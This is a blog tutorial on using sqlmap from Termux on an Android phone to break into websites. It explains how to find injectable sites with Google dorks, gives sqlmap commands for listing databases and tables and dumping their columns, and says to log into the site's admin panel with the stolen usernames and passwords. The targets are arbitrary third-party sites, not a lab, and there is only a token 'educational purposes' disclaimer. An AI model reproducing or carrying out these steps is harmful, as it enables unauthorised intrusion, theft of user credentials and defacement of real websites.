Hello Guys, Today We going to learn how to hack a website using SQLMAP. You can use this tool on an Android device with the help of the Termux application. Today we are going to use this tool to hack a website.

Note: This post is only for educational purposes. For any illegal activity me and my blog are not responsible for that.





? Termux
? Android device (you can also use the unrooted device)


Step by Step Guide to use Sqlmap




FIRST STEP: First of all, you have to install Termux on your android device. Then install Sqlmap in the Termux application. The Sqlamp installation process is below:-

apt update && apt upgrade
pkg install git
pkg install python python2 
git clone https://github.com/sqlmapproject/sqlmap

Okay, now Sqlmap is installed. Now move to the next step.

SECOND STEP: Now, you have to find SQL vulnerable sites. Use Google Dorks to find vulnerable websites. Choose a vulnerable site and go back to termux.

See More:

Latest Google Dorks List 

Q: How to check which site is vulnerable?

A: I use this dork (PHP?id=) and open a website that contains URLs like www.abc.com/php?id=1. Now enter quote (‘)  after 1 and hit enter. Now, if the website gives you an error(as shown in the image below), you can try this attack on that website.

How to Hack a Website



THIRD STEP: Now it’s time to attack. Copy that site link and Put the below commands on termux.


cd sqlmap
python2 sqlmap.py -u site.com/php?id=1 –dbs
python2 sqlmap.py -u site.com/php?id=1 -D databaseName –tables
python2 sqlmap.py -u site.com/php?id=1 -D DatabaseName -T TableName –columns
python2 sqlmap.py -u site.com/php?id=1 -D DatabaseName -T TableName -C ColumnName –dump

Note: Replace site.com with your target website URL.  

Okay, After that, you will get a Username/Email and Password ?. Now find the website admin login panel and log in with credentials. Now you can make changes to the website. 

See More:

Find Website Admin Panel Using Termux

Find Admin Panel Using Dorks

I hoped you liked this article and understood each step. If you still have any queries, then you can ask me in the comment section.